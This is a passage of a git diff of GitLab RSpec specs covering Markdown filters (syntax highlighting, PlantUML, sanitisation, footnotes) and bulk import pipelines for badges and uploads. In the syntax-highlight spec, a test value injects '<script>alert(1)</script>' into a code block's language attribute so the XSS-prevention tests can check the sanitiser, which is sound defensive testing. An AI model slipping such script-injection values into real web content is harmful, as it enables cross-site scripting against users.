Hello</code></pre>' @@ -24,7 +24,7 @@ RSpec.describe Banzai::Filter::PlantumlFilter do it 'does not replace plantuml pre tag with img tag if disabled' do stub_application_setting(plantuml_enabled: false) - if Feature.enabled?(:use_cmark_renderer) + if Feature.enabled?(:use_cmark_renderer, default_enabled: :yaml) input = '<pre lang="plantuml"><code>Bob -> Sara : Hello</code></pre>' output = '<pre lang="plantuml"><code>Bob -> Sara : Hello</code></pre>' else @@ -40,7 +40,7 @@ RSpec.describe Banzai::Filter::PlantumlFilter do it 'does not replace plantuml pre tag with img tag if url is invalid' do stub_application_setting(plantuml_enabled: true, plantuml_url: "invalid") - input = if Feature.enabled?(:use_cmark_renderer) + input = if Feature.enabled?(:use_cmark_renderer, default_enabled: :yaml) '<pre lang="plantuml"><code>Bob -> Sara : Hello</code></pre>' else '<pre><code lang="plantuml">Bob -> Sara : Hello</code></pre>' diff --git a/spec/lib/banzai/filter/references/issue_reference_filter_spec.rb b/spec/lib/banzai/filter/references/issue_reference_filter_spec.rb index 88c2494b243..14c1542b724 100644 --- a/spec/lib/banzai/filter/references/issue_reference_filter_spec.rb +++ b/spec/lib/banzai/filter/references/issue_reference_filter_spec.rb @@ -116,6 +116,22 @@ RSpec.describe Banzai::Filter::References::IssueReferenceFilter do expect(doc.children.first.attr('data-original')).to eq inner_html end + it 'includes a data-reference-format attribute' do + doc = reference_filter("Issue #{reference}+") + link = doc.css('a').first + + expect(link).to have_attribute('data-reference-format') + expect(link.attr('data-reference-format')).to eq('+') + end + + it 'includes a data-reference-format attribute for URL references' do + doc = reference_filter("Issue #{issue_url}+") + link = doc.css('a').first + + expect(link).to have_attribute('data-reference-format') + expect(link.attr('data-reference-format')).to eq('+') + end + it 'supports an :only_path context' do doc = reference_filter("Issue #{reference}", only_path: true) link = doc.css('a').first.attr('href') diff --git a/spec/lib/banzai/filter/references/merge_request_reference_filter_spec.rb b/spec/lib/banzai/filter/references/merge_request_reference_filter_spec.rb index ee2ce967a47..3c488820853 100644 --- a/spec/lib/banzai/filter/references/merge_request_reference_filter_spec.rb +++ b/spec/lib/banzai/filter/references/merge_request_reference_filter_spec.rb @@ -109,6 +109,22 @@ RSpec.describe Banzai::Filter::References::MergeRequestReferenceFilter do expect(link.attr('data-merge-request')).to eq merge.id.to_s end + it 'includes a data-reference-format attribute' do + doc = reference_filter("Merge #{reference}+") + link = doc.css('a').first + + expect(link).to have_attribute('data-reference-format') + expect(link.attr('data-reference-format')).to eq('+') + end + + it 'includes a data-reference-format attribute for URL references' do + doc = reference_filter("Merge #{urls.project_merge_request_url(project, merge)}+") + link = doc.css('a').first + + expect(link).to have_attribute('data-reference-format') + expect(link.attr('data-reference-format')).to eq('+') + end + it 'supports an :only_path context' do doc = reference_filter("Merge #{reference}", only_path: true) link = doc.css('a').first.attr('href') diff --git a/spec/lib/banzai/filter/references/reference_cache_spec.rb b/spec/lib/banzai/filter/references/reference_cache_spec.rb index dcd153da16a..dc43c33a08d 100644 --- a/spec/lib/banzai/filter/references/reference_cache_spec.rb +++ b/spec/lib/banzai/filter/references/reference_cache_spec.rb @@ -35,18 +35,6 @@ RSpec.describe Banzai::Filter::References::ReferenceCache do subject end - - context 'when feature flag is disabled' do - before do - stub_feature_flags(reference_cache_memoization: false) - end - - it 'ignores memoized rendered HTML' do - expect(doc).to receive(:to_html).and_call_original - - subject - end - end end context 'when result is not available' do diff --git a/spec/lib/banzai/filter/sanitization_filter_spec.rb b/spec/lib/banzai/filter/sanitization_filter_spec.rb index 8eb8e5cf800..24e787bddd5 100644 --- a/spec/lib/banzai/filter/sanitization_filter_spec.rb +++ b/spec/lib/banzai/filter/sanitization_filter_spec.rb @@ -115,6 +115,11 @@ RSpec.describe Banzai::Filter::SanitizationFilter do expect(filter(act).to_html).to eq exp end + it 'allows `rel=license` in links' do + exp = act = '<a rel="license" href="http://example.com">rel-license</a>' + expect(filter(act).to_html).to eq exp + end + it 'allows `data-math-style` attribute on `code` and `pre` elements' do html = <<-HTML <pre class="code" data-math-style="inline">something</pre> diff --git a/spec/lib/banzai/filter/syntax_highlight_filter_spec.rb b/spec/lib/banzai/filter/syntax_highlight_filter_spec.rb index dfe022b51d2..ef46fd62486 100644 --- a/spec/lib/banzai/filter/syntax_highlight_filter_spec.rb +++ b/spec/lib/banzai/filter/syntax_highlight_filter_spec.rb @@ -24,7 +24,7 @@ RSpec.describe Banzai::Filter::SyntaxHighlightFilter do it "highlights as plaintext" do result = filter('<pre><code>def fun end</code></pre>') - expect(result.to_html).to eq('<pre class="code highlight js-syntax-highlight language-plaintext" lang="plaintext" v-pre="true"><code><span id="LC1" class="line" lang="plaintext">def fun end</span></code></pre>') + expect(result.to_html.delete("\n")).to eq('<div class="gl-relative markdown-code-block js-markdown-code"><pre class="code highlight js-syntax-highlight language-plaintext" lang="plaintext" v-pre="true"><code><span id="LC1" class="line" lang="plaintext">def fun end</span></code></pre><copy-code></copy-code></div>') end include_examples "XSS prevention", "" @@ -40,13 +40,13 @@ RSpec.describe Banzai::Filter::SyntaxHighlightFilter do context "when a valid language is specified" do it "highlights as that language" do - result = if Feature.enabled?(:use_cmark_renderer) + result = if Feature.enabled?(:use_cmark_renderer, default_enabled: :yaml) filter('<pre lang="ruby"><code>def fun end</code></pre>') else filter('<pre><code lang="ruby">def fun end</code></pre>') end - expect(result.to_html).to eq('<pre class="code highlight js-syntax-highlight language-ruby" lang="ruby" v-pre="true"><code><span id="LC1" class="line" lang="ruby"><span class="k">def</span> <span class="nf">fun</span> <span class="k">end</span></span></code></pre>') + expect(result.to_html.delete("\n")).to eq('<div class="gl-relative markdown-code-block js-markdown-code"><pre class="code highlight js-syntax-highlight language-ruby" lang="ruby" v-pre="true"><code><span id="LC1" class="line" lang="ruby"><span class="k">def</span> <span class="nf">fun</span> <span class="k">end</span></span></code></pre><copy-code></copy-code></div>') end include_examples "XSS prevention", "ruby" @@ -54,13 +54,13 @@ RSpec.describe Banzai::Filter::SyntaxHighlightFilter do context "when an invalid language is specified" do it "highlights as plaintext" do - result = if Feature.enabled?(:use_cmark_renderer) + result = if Feature.enabled?(:use_cmark_renderer, default_enabled: :yaml) filter('<pre lang="gnuplot"><code>This is a test</code></pre>') else filter('<pre><code lang="gnuplot">This is a test</code></pre>') end - expect(result.to_html).to eq('<pre class="code highlight js-syntax-highlight language-plaintext" lang="plaintext" v-pre="true"><code><span id="LC1" class="line" lang="plaintext">This is a test</span></code></pre>') + expect(result.to_html.delete("\n")).to eq('<div class="gl-relative markdown-code-block js-markdown-code"><pre class="code highlight js-syntax-highlight language-plaintext" lang="plaintext" v-pre="true"><code><span id="LC1" class="line" lang="plaintext">This is a test</span></code></pre><copy-code></copy-code></div>') end include_examples "XSS prevention", "gnuplot" @@ -73,13 +73,13 @@ RSpec.describe Banzai::Filter::SyntaxHighlightFilter do %w(math mermaid plantuml suggestion).each do |lang| context "when #{lang} is specified" do it "highlights as plaintext but with the correct language attribute and class" do - result = if Feature.enabled?(:use_cmark_renderer) + result = if Feature.enabled?(:use_cmark_renderer, default_enabled: :yaml) filter(%{<pre lang="#{lang}"><code>This is a test</code></pre>}) else filter(%{<pre><code lang="#{lang}">This is a test</code></pre>}) end - expect(result.to_html).to eq(%{<pre class="code highlight js-syntax-highlight language-#{lang}" lang="#{lang}" v-pre="true"><code><span id="LC1" class="line" lang="#{lang}">This is a test</span></code></pre>}) + expect(result.to_html.delete("\n")).to eq(%{<div class="gl-relative markdown-code-block js-markdown-code"><pre class="code highlight js-syntax-highlight language-#{lang}" lang="#{lang}" v-pre="true"><code><span id="LC1" class="line" lang="#{lang}">This is a test</span></code></pre><copy-code></copy-code></div>}) end include_examples "XSS prevention", lang @@ -89,7 +89,7 @@ RSpec.describe Banzai::Filter::SyntaxHighlightFilter do let(:lang_params) { 'foo-bar-kux' } let(:xss_lang) do - if Feature.enabled?(:use_cmark_renderer) + if Feature.enabled?(:use_cmark_renderer, default_enabled: :yaml) "#{lang} data-meta=\"foo-bar-kux\"<script>alert(1)</script>" else "#{lang}#{described_class::LANG_PARAMS_DELIMITER}<script>alert(1)</script>" @@ -97,18 +97,18 @@ RSpec.describe Banzai::Filter::SyntaxHighlightFilter do end it "includes data-lang-params tag with extra information" do - result = if Feature.enabled?(:use_cmark_renderer) + result = if Feature.enabled?(:use_cmark_renderer, default_enabled: :yaml) filter(%{<pre lang="#{lang}" data-meta="#{lang_params}"><code>This is a test</code></pre>}) else filter(%{<pre><code lang="#{lang}#{delimiter}#{lang_params}">This is a test</code></pre>}) end - expect(result.to_html).to eq(%{<pre class="code highlight js-syntax-highlight language-#{lang}" lang="#{lang}" #{data_attr}="#{lang_params}" v-pre="true"><code><span id="LC1" class="line" lang="#{lang}">This is a test</span></code></pre>}) + expect(result.to_html.delete("\n")).to eq(%{<div class="gl-relative markdown-code-block js-markdown-code"><pre class="code highlight js-syntax-highlight language-#{lang}" lang="#{lang}" #{data_attr}="#{lang_params}" v-pre="true"><code><span id="LC1" class="line" lang="#{lang}">This is a test</span></code></pre><copy-code></copy-code></div>}) end include_examples "XSS prevention", lang - if Feature.enabled?(:use_cmark_renderer) + if Feature.enabled?(:use_cmark_renderer, default_enabled: :yaml) include_examples "XSS prevention", "#{lang} data-meta=\"foo-bar-kux\"<script>alert(1)</script>" else @@ -126,19 +126,19 @@ RSpec.describe Banzai::Filter::SyntaxHighlightFilter do let(:lang_params) { '-1+10' } let(:expected_result) do - %{<pre class="code highlight js-syntax-highlight language-#{lang}" lang="#{lang}" #{data_attr}="#{lang_params} more-things" v-pre="true"><code><span id="LC1" class="line" lang="#{lang}">This is a test</span></code></pre>} + %{<div class="gl-relative markdown-code-block js-markdown-code"><pre class="code highlight js-syntax-highlight language-#{lang}" lang="#{lang}" #{data_attr}="#{lang_params} more-things" v-pre="true"><code><span id="LC1" class="line" lang="#{lang}">This is a test</span></code></pre><copy-code></copy-code></div>} end context 'when delimiter is space' do it 'delimits on the first appearance' do - if Feature.enabled?(:use_cmark_renderer) + if Feature.enabled?(:use_cmark_renderer, default_enabled: :yaml) result = filter(%{<pre lang="#{lang}" data-meta="#{lang_params} more-things"><code>This is a test</code></pre>}) - expect(result.to_html).to eq(expected_result) + expect(result.to_html.delete("\n")).to eq(expected_result) else result = filter(%{<pre><code lang="#{lang}#{delimiter}#{lang_params}#{delimiter}more-things">This is a test</code></pre>}) - expect(result.to_html).to eq(%{<pre class="code highlight js-syntax-highlight language-#{lang}" lang="#{lang}" #{data_attr}="#{lang_params}#{delimiter}more-things" v-pre="true"><code><span id="LC1" class="line" lang="#{lang}">This is a test</span></code></pre>}) + expect(result.to_html.delete("\n")).to eq(%{<div class="gl-relative markdown-code-block js-markdown-code"><pre class="code highlight js-syntax-highlight language-#{lang}" lang="#{lang}" #{data_attr}="#{lang_params}#{delimiter}more-things" v-pre="true"><code><span id="LC1" class="line" lang="#{lang}">This is a test</span></code></pre><copy-code></copy-code></div>}) end end end @@ -147,10 +147,10 @@ RSpec.describe Banzai::Filter::SyntaxHighlightFilter do it 'delimits on the first appearance' do result = filter(%{<pre lang="#{lang}#{delimiter}#{lang_params} more-things"><code>This is a test</code></pre>}) - if Feature.enabled?(:use_cmark_renderer) - expect(result.to_html).to eq(expected_result) + if Feature.enabled?(:use_cmark_renderer, default_enabled: :yaml) + expect(result.to_html.delete("\n")).to eq(expected_result) else - expect(result.to_html).to eq(%{<pre class=\"code highlight js-syntax-highlight language-plaintext\" lang=\"plaintext\" v-pre=\"true\"><code><span id=\"LC1\" class=\"line\" lang=\"plaintext\">This is a test</span></code></pre>}) + expect(result.to_html.delete("\n")).to eq(%{<div class="gl-relative markdown-code-block js-markdown-code"><pre class=\"code highlight js-syntax-highlight language-plaintext\" lang=\"plaintext\" v-pre=\"true\"><code><span id=\"LC1\" class=\"line\" lang=\"plaintext\">This is a test</span></code></pre><copy-code></copy-code></div>}) end end end @@ -161,7 +161,7 @@ RSpec.describe Banzai::Filter::SyntaxHighlightFilter do it "includes it in the highlighted code block" do result = filter('<pre data-sourcepos="1:1-3:3"><code lang="plaintext">This is a test</code></pre>') - expect(result.to_html).to eq('<pre data-sourcepos="1:1-3:3" class="code highlight js-syntax-highlight language-plaintext" lang="plaintext" v-pre="true"><code><span id="LC1" class="line" lang="plaintext">This is a test</span></code></pre>') + expect(result.to_html.delete("\n")).to eq('<div class="gl-relative markdown-code-block js-markdown-code"><pre data-sourcepos="1:1-3:3" class="code highlight js-syntax-highlight language-plaintext" lang="plaintext" v-pre="true"><code><span id="LC1" class="line" lang="plaintext">This is a test</span></code></pre><copy-code></copy-code></div>') end end @@ -173,13 +173,13 @@ RSpec.describe Banzai::Filter::SyntaxHighlightFilter do end it "highlights as plaintext" do - result = if Feature.enabled?(:use_cmark_renderer) + result = if Feature.enabled?(:use_cmark_renderer, default_enabled: :yaml) filter('<pre lang="ruby"><code>This is a test</code></pre>') else filter('<pre><code lang="ruby">This is a test</code></pre>') end - expect(result.to_html).to eq('<pre class="code highlight js-syntax-highlight" lang="" v-pre="true"><code><span id="LC1" class="line" lang="">This is a test</span></code></pre>') + expect(result.to_html.delete("\n")).to eq('<div class="gl-relative markdown-code-block js-markdown-code"><pre class="code highlight js-syntax-highlight" lang="" v-pre="true"><code><span id="LC1" class="line" lang="">This is a test</span></code></pre><copy-code></copy-code></div>') end include_examples "XSS prevention", "ruby" diff --git a/spec/lib/banzai/pipeline/full_pipeline_spec.rb b/spec/lib/banzai/pipeline/full_pipeline_spec.rb index 01bca7b23e8..620b7d97a5b 100644 --- a/spec/lib/banzai/pipeline/full_pipeline_spec.rb +++ b/spec/lib/banzai/pipeline/full_pipeline_spec.rb @@ -43,26 +43,27 @@ RSpec.describe Banzai::Pipeline::FullPipeline do let(:filtered_footnote) do <<~EOF.strip_heredoc - <p dir="auto">first<sup class="footnote-ref"><a href="#fn-1-#{identifier}" id="fnref-1-#{identifier}" data-footnote-ref="">1</a></sup> and second<sup class="footnote-ref"><a href="#fn-%F0%9F%98%84second-#{identifier}" id="fnref-%F0%9F%98%84second-#{identifier}" data-footnote-ref="">2</a></sup> and twenty<sup class="footnote-ref"><a href="#fn-_twenty-#{identifier}" id="fnref-_twenty-#{identifier}" data-footnote-ref="">3</a></sup></p> - - <section class="footnotes" data-footnotes><ol> + <p dir="auto">first<sup class="footnote-ref"><a href="#fn-1-#{identifier}" id="fnref-1-#{identifier}" data-footnote-ref>1</a></sup> and second<sup class="footnote-ref"><a href="#fn-%F0%9F%98%84second-#{identifier}" id="fnref-%F0%9F%98%84second-#{identifier}" data-footnote-ref>2</a></sup> and twenty<sup class="footnote-ref"><a href="#fn-_twenty-#{identifier}" id="fnref-_twenty-#{identifier}" data-footnote-ref>3</a></sup></p> + <section data-footnotes class="footnotes"> + <ol> <li id="fn-1-#{identifier}"> - <p>one <a href="#fnref-1-#{identifier}" aria-label="Back to content" class="footnote-backref" data-footnote-backref=""><gl-emoji title="leftwards arrow with hook" data-name="leftwards_arrow_with_hook" data-unicode-version="1.1">↩</gl-emoji></a></p> + <p>one <a href="#fnref-1-#{identifier}" data-footnote-backref aria-label="Back to content" class="footnote-backref"><gl-emoji title="leftwards arrow with hook" data-name="leftwards_arrow_with_hook" data-unicode-version="1.1">↩</gl-emoji></a></p> </li> <li id="fn-%F0%9F%98%84second-#{identifier}"> - <p>two <a href="#fnref-%F0%9F%98%84second-#{identifier}" aria-label="Back to content" class="footnote-backref" data-footnote-backref=""><gl-emoji title="leftwards arrow with hook" data-name="leftwards_arrow_with_hook" data-unicode-version="1.1">↩</gl-emoji></a></p> + <p>two <a href="#fnref-%F0%9F%98%84second-#{identifier}" data-footnote-backref aria-label="Back to content" class="footnote-backref"><gl-emoji title="leftwards arrow with hook" data-name="leftwards_arrow_with_hook" data-unicode-version="1.1">↩</gl-emoji></a></p> </li> <li id="fn-_twenty-#{identifier}"> - <p>twenty <a href="#fnref-_twenty-#{identifier}" aria-label="Back to content" class="footnote-backref" data-footnote-backref=""><gl-emoji title="leftwards arrow with hook" data-name="leftwards_arrow_with_hook" data-unicode-version="1.1">↩</gl-emoji></a></p> + <p>twenty <a href="#fnref-_twenty-#{identifier}" data-footnote-backref aria-label="Back to content" class="footnote-backref"><gl-emoji title="leftwards arrow with hook" data-name="leftwards_arrow_with_hook" data-unicode-version="1.1">↩</gl-emoji></a></p> </li> - </ol></section> + </ol> + </section> EOF end it 'properly adds the necessary ids and classes' do stub_commonmark_sourcepos_disabled - expect(html.lines.map(&:strip).join("\n")).to eq filtered_footnote + expect(html.lines.map(&:strip).join("\n")).to eq filtered_footnote.strip end context 'using ruby-based HTML renderer' do diff --git a/spec/lib/banzai/pipeline/plain_markdown_pipeline_spec.rb b/spec/lib/banzai/pipeline/plain_markdown_pipeline_spec.rb index 394fcc06eba..c8cd9d4fcac 100644 --- a/spec/lib/banzai/pipeline/plain_markdown_pipeline_spec.rb +++ b/spec/lib/banzai/pipeline/plain_markdown_pipeline_spec.rb @@ -71,7 +71,7 @@ RSpec.describe Banzai::Pipeline::PlainMarkdownPipeline do let(:markdown) { %Q(``` foo\\@bar\nfoo\n```) } it 'renders correct html' do - if Feature.enabled?(:use_cmark_renderer) + if Feature.enabled?(:use_cmark_renderer, default_enabled: :yaml) correct_html_included(markdown, %Q(<pre data-sourcepos="1:1-3:3" lang="foo@bar"><code>foo\n</code></pre>)) else correct_html_included(markdown, %Q(<code lang="foo@bar">foo\n</code>)) diff --git a/spec/lib/banzai/reference_parser/base_parser_spec.rb b/spec/lib/banzai/reference_parser/base_parser_spec.rb index 4701caa0667..d31ccccd6c3 100644 --- a/spec/lib/banzai/reference_parser/base_parser_spec.rb +++ b/spec/lib/banzai/reference_parser/base_parser_spec.rb @@ -29,10 +29,10 @@ RSpec.describe Banzai::ReferenceParser::BaseParser do describe '#project_for_node' do it 'returns the Project for a node' do - document = instance_double('document', fragment?: false) - project = instance_double('project') - object = instance_double('object', project: project) - node = instance_double('node', document: document) + document = double('document', fragment?: false) + project = instance_double('Project') + object = double('object', project: project) + node = double('node', document: document) context.associate_document(document, object) diff --git a/spec/lib/banzai/render_context_spec.rb b/spec/lib/banzai/render_context_spec.rb index c4b609b936e..4b5c2c5a7df 100644 --- a/spec/lib/banzai/render_context_spec.rb +++ b/spec/lib/banzai/render_context_spec.rb @@ -7,15 +7,15 @@ RSpec.describe Banzai::RenderContext do describe '#project_for_node' do it 'returns the default project if no associated project was found' do - project = instance_double('project') + project = instance_double('Project') context = described_class.new(project) expect(context.project_for_node(document)).to eq(project) end it 'returns the associated project if one was associated explicitly' do - project = instance_double('project') - obj = instance_double('object', project: project) + project = instance_double('Project') + obj = double('object', project: project) context = described_class.new context.associate_document(document, obj) @@ -24,8 +24,8 @@ RSpec.describe Banzai::RenderContext do end it 'returns the project associated with a DocumentFragment when using a node' do - project = instance_double('project') - obj = instance_double('object', project: project) + project = instance_double('Project') + obj = double('object', project: project) context = described_class.new node = document.children.first diff --git a/spec/lib/bulk_imports/clients/http_spec.rb b/spec/lib/bulk_imports/clients/http_spec.rb index 623f9aa453a..1bbc96af8ee 100644 --- a/spec/lib/bulk_imports/clients/http_spec.rb +++ b/spec/lib/bulk_imports/clients/http_spec.rb @@ -38,11 +38,11 @@ RSpec.describe BulkImports::Clients::HTTP do context 'when response is not success' do it 'raises BulkImports::Error' do - response_double = double(code: 503, success?: false) + response_double = double(code: 503, success?: false, request: double(path: double(path: '/test'))) allow(Gitlab::HTTP).to receive(method).and_return(response_double) - expect { subject.public_send(method, resource) }.to raise_exception(BulkImports::NetworkError) + expect { subject.public_send(method, resource) }.to raise_exception(BulkImports::NetworkError, 'Unsuccessful response 503 from /test') end end end diff --git a/spec/lib/bulk_imports/common/pipelines/badges_pipeline_spec.rb b/spec/lib/bulk_imports/common/pipelines/badges_pipeline_spec.rb new file mode 100644 index 00000000000..6c5465c8a66 --- /dev/null +++ b/spec/lib/bulk_imports/common/pipelines/badges_pipeline_spec.rb @@ -0,0 +1,96 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe BulkImports::Common::Pipelines::BadgesPipeline do + let_it_be(:user) { create(:user) } + let_it_be(:group) { create(:group) } + let_it_be(:project) { create(:project) } + + let(:entity) { create(:bulk_import_entity, group: group) } + let(:tracker) { create(:bulk_import_tracker, entity: entity) } + let(:context) { BulkImports::Pipeline::Context.new(tracker) } + + subject(:pipeline) { described_class.new(context) } + + describe '#run' do + let(:first_page) { extracted_data(has_next_page: true) } + let(:last_page) { extracted_data(name: 'badge2') } + + before do + allow_next_instance_of(BulkImports::Common::Extractors::RestExtractor) do |extractor| + allow(extractor).to receive(:extract).and_return(first_page, last_page) + end + end + + it 'imports a group badge' do + expect { pipeline.run }.to change(Badge, :count).by(2) + + badge = group.badges.last + + expect(badge.name).to eq('badge2') + expect(badge.link_url).to eq(badge_data['link_url']) + expect(badge.image_url).to eq(badge_data['image_url']) + end + + context 'when project entity' do + let(:first_page) { extracted_data(has_next_page: true) } + let(:last_page) { extracted_data(name: 'badge2', kind: 'project') } + let(:entity) { create(:bulk_import_entity, :project_entity, project: project) } + + it 'imports a project badge & skips group badge' do + expect { pipeline.run }.to change(Badge, :count).by(1) + + badge = project.badges.last + + expect(badge.name).to eq('badge2') + expect(badge.link_url).to eq(badge_data['link_url']) + expect(badge.image_url).to eq(badge_data['image_url']) + expect(badge.type).to eq('ProjectBadge') + end + end + + describe '#transform' do + it 'return transformed badge hash' do + badge = subject.transform(context, badge_data) + + expect(badge[:name]).to eq('badge') + expect(badge[:link_url]).to eq(badge_data['link_url']) + expect(badge[:image_url]).to eq(badge_data['image_url']) + expect(badge.keys).to contain_exactly(:name, :link_url, :image_url) + end + + context 'when data is blank' do + it 'does nothing when the data is blank' do + expect(subject.transform(context, nil)).to be_nil + end + end + + context 'when project entity & group badge' do + let(:entity) { create(:bulk_import_entity, :project_entity, project: project) } + + it 'returns' do + expect(subject.transform(context, { 'name' => 'test', 'kind' => 'group' })).to be_nil + end + end + end + + def badge_data(name = 'badge', kind = 'group') + { + 'name' => name, + 'link_url' => 'https://gitlab.example.com', + 'image_url' => 'https://gitlab.example.com/image.png', + 'kind' => kind + } + end + + def extracted_data(name: 'badge', kind: 'group', has_next_page: false) + page_info = { + 'has_next_page' => has_next_page, + 'next_page' => has_next_page ? '2' : nil + } + + BulkImports::Pipeline::ExtractedData.new(data: [badge_data(name, kind)], page_info: page_info) + end + end +end diff --git a/spec/lib/bulk_imports/common/pipelines/labels_pipeline_spec.rb b/spec/lib/bulk_imports/common/pipelines/labels_pipeline_spec.rb index 9e3a6d5b8df..48db24def48 100644 --- a/spec/lib/bulk_imports/common/pipelines/labels_pipeline_spec.rb +++ b/spec/lib/bulk_imports/common/pipelines/labels_pipeline_spec.rb @@ -59,16 +59,6 @@ RSpec.describe BulkImports::Common::Pipelines::LabelsPipeline do end end - context 'when label is persisted' do - it 'does not save label' do - label = create(:group_label, group: group) - - expect(label).not_to receive(:save!) - - subject.load(context, label) - end - end - context 'when label is missing' do it 'returns' do expect(subject.load(context, nil)).to be_nil diff --git a/spec/lib/bulk_imports/common/pipelines/milestones_pipeline_spec.rb b/spec/lib/bulk_imports/common/pipelines/milestones_pipeline_spec.rb index 9f71175f46f..902b29bc365 100644 --- a/spec/lib/bulk_imports/common/pipelines/milestones_pipeline_spec.rb +++ b/spec/lib/bulk_imports/common/pipelines/milestones_pipeline_spec.rb @@ -81,16 +81,6 @@ RSpec.describe BulkImports::Common::Pipelines::MilestonesPipeline do end end - context 'when milestone is persisted' do - it 'does not save milestone' do - milestone = create(:milestone, group: group) - - expect(milestone).not_to receive(:save!) - - subject.load(context, milestone) - end - end - context 'when milestone is missing' do it 'returns' do expect(subject.load(context, nil)).to be_nil diff --git a/spec/lib/bulk_imports/common/pipelines/uploads_pipeline_spec.rb b/spec/lib/bulk_imports/common/pipelines/uploads_pipeline_spec.rb index a3cc866a406..0f6238e10dc 100644 --- a/spec/lib/bulk_imports/common/pipelines/uploads_pipeline_spec.rb +++ b/spec/lib/bulk_imports/common/pipelines/uploads_pipeline_spec.rb @@ -5,11 +5,12 @@ require 'spec_helper' RSpec.describe BulkImports::Common::Pipelines::UploadsPipeline do let_it_be(:tmpdir) { Dir.mktmpdir } let_it_be(:project) { create(:project) } - let_it_be(:entity) { create(:bulk_import_entity, :project_entity, project: project, source_full_path: 'test') } - let_it_be(:tracker) { create(:bulk_import_tracker, entity: entity) } - let_it_be(:context) { BulkImports::Pipeline::Context.new(tracker) } - let_it_be(:uploads_dir_path) { File.join(tmpdir, '72a497a02fe3ee09edae2ed06d390038') } - let_it_be(:upload_file_path) { File.join(uploads_dir_path, 'upload.txt')} + let_it_be(:group) { create(:group) } + + let(:uploads_dir_path) { File.join(tmpdir, '72a497a02fe3ee09edae2ed06d390038') } + let(:upload_file_path) { File.join(uploads_dir_path, 'upload.txt')} + let(:tracker) { create(:bulk_import_tracker, entity: entity) } + let(:context) { BulkImports::Pipeline::Context.new(tracker) } subject(:pipeline) { described_class.new(context) } @@ -24,57 +25,101 @@ RSpec.describe BulkImports::Common::Pipelines::UploadsPipeline do FileUtils.remove_entry(tmpdir) if Dir.exist?(tmpdir) end - describe '#run' do - it 'imports uploads into destination portable and removes tmpdir' do - allow(Dir).to receive(:mktmpdir).with('bulk_imports').and_return(tmpdir) - allow(pipeline).to receive(:extract).and_return(BulkImports::Pipeline::ExtractedData.new(data: [upload_file_path])) + shared_examples 'uploads import' do + describe '#run' do + before do + allow(Dir).to receive(:mktmpdir).with('bulk_imports').and_return(tmpdir) + allow(pipeline).to receive(:extract).and_return(BulkImports::Pipeline::ExtractedData.new(data: [upload_file_path])) + end - pipeline.run + it 'imports uploads into destination portable and removes tmpdir' do + pipeline.run - expect(project.uploads.map { |u| u.retrieve_uploader.filename }).to include('upload.txt') + expect(portable.uploads.map { |u| u.retrieve_uploader.filename }).to include('upload.txt') - expect(Dir.exist?(tmpdir)).to eq(false) - end - end + expect(Dir.exist?(tmpdir)).to eq(false) + end - describe '#extract' do - it 'downloads & extracts upload paths' do - allow(Dir).to receive(:mktmpdir).and_return(tmpdir) - expect(pipeline).to receive(:untar_zxf) - file_download_service = instance_double("BulkImports::FileDownloadService") + context 'when importing avatar' do + let(:uploads_dir_path) { File.join(tmpdir, 'avatar') } - expect(BulkImports::FileDownloadService) - .to receive(:new) - .with( - configuration: context.configuration, - relative_url: "/projects/test/export_relations/download?relation=uploads", - dir: tmpdir, - filename: 'uploads.tar.gz') - .and_return(file_download_service) + it 'imports avatar' do + FileUtils.touch(File.join(uploads_dir_path, 'avatar.png')) - expect(file_download_service).to receive(:execute) + expect_next_instance_of(entity.update_service) do |service| + expect(service).to receive(:execute) + end - extracted_data = pipeline.extract(context) + pipeline.run + end - expect(extracted_data.data).to contain_exactly(uploads_dir_path, upload_file_path) - end - end + context 'when something goes wrong' do + it 'raises exception' do + allow_next_instance_of(entity.update_service) do |service| + allow(service).to receive(:execute).and_return(nil) + end + + pipeline.run - describe '#load' do - it 'creates a file upload' do - expect { pipeline.load(context, upload_file_path) }.to change { project.uploads.count }.by(1) + expect(entity.failures.first.exception_class).to include('AvatarLoadingError') + end + end + end end - context 'when dynamic path is nil' do - it 'returns' do - expect { pipeline.load(context, File.join(tmpdir, 'test')) }.not_to change { project.uploads.count } + describe '#extract' do + it 'downloads & extracts upload paths' do + allow(Dir).to receive(:mktmpdir).and_return(tmpdir) + expect(pipeline).to receive(:untar_zxf) + file_download_service = instance_double("BulkImports::FileDownloadService") + + expect(BulkImports::FileDownloadService) + .to receive(:new) + .with( + configuration: context.configuration, + relative_url: "/#{entity.pluralized_name}/test/export_relations/download?relation=uploads", + dir: tmpdir, + filename: 'uploads.tar.gz') + .and_return(file_download_service) + + expect(file_download_service).to receive(:execute) + + extracted_data = pipeline.extract(context) + + expect(extracted_data.data).to contain_exactly(uploads_dir_path, upload_file_path) end end - context 'when path is a directory' do - it 'returns' do - expect { pipeline.load(context, uploads_dir_path) }.not_to change { project.uploads.count } + describe '#load' do + it 'creates a file upload' do + expect { pipeline.load(context, upload_file_path) }.to change { portable.uploads.count }.by(1) + end + + context 'when dynamic path is nil' do + it 'returns' do + expect { pipeline.load(context, File.join(tmpdir, 'test')) }.not_to change { portable.uploads.count } + end + end + + context 'when path is a directory' do + it 'returns' do + expect { pipeline.load(context, uploads_dir_path) }.not_to change { portable.uploads.count } + end end end end + + context 'when importing to group' do + let(:portable) { group } + let(:entity) { create(:bulk_import_entity, :group_entity, group: group, source_full_path: 'test') } + + include_examples 'uploads import' + end + + context 'when importing to project' do + let(:portable) { project } + let(:entity) { create(:bulk_import_entity, :project_entity, project: project, source_full_path: 'test') } + + include_examples 'uploads import' + end end diff --git a/spec/lib/bulk_imports/common/rest/get_badges_query_spec.rb b/spec/lib/bulk_imports/common/rest/get_badges_query_spec.rb new file mode 100644 index 00000000000..0a04c0a2243 --- /dev/null +++ b/spec/lib/bulk_imports/common/rest/get_badges_query_spec.rb @@ -0,0 +1,36 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe BulkImports::Common::Rest::GetBadgesQuery do + describe '.to_h' do + shared_examples 'resource and page info query' do + let(:tracker) { create(:bulk_import_tracker, entity: entity) } + let(:context) { BulkImports::Pipeline::Context.new(tracker) } + let(:encoded_full_path) { ERB::Util.url_encode(entity.source_full_path) } + + it 'returns correct query and page info' do + expected = { + resource: [entity.pluralized_name, encoded_full_path, 'badges'].join('/'), + query: { + page: context.tracker.next_page + } + } + + expect(described_class.to_h(context)).to eq(expected) + end + end + + context 'when entity is group' do + let(:entity) { create(:bulk_import_entity) } + + include_examples 'resource and page info query' + end + + context 'when entity is project' do + let(:entity) { create(:bulk_import_entity, :project_entity) } + + include_examples 'resource and page info query' + 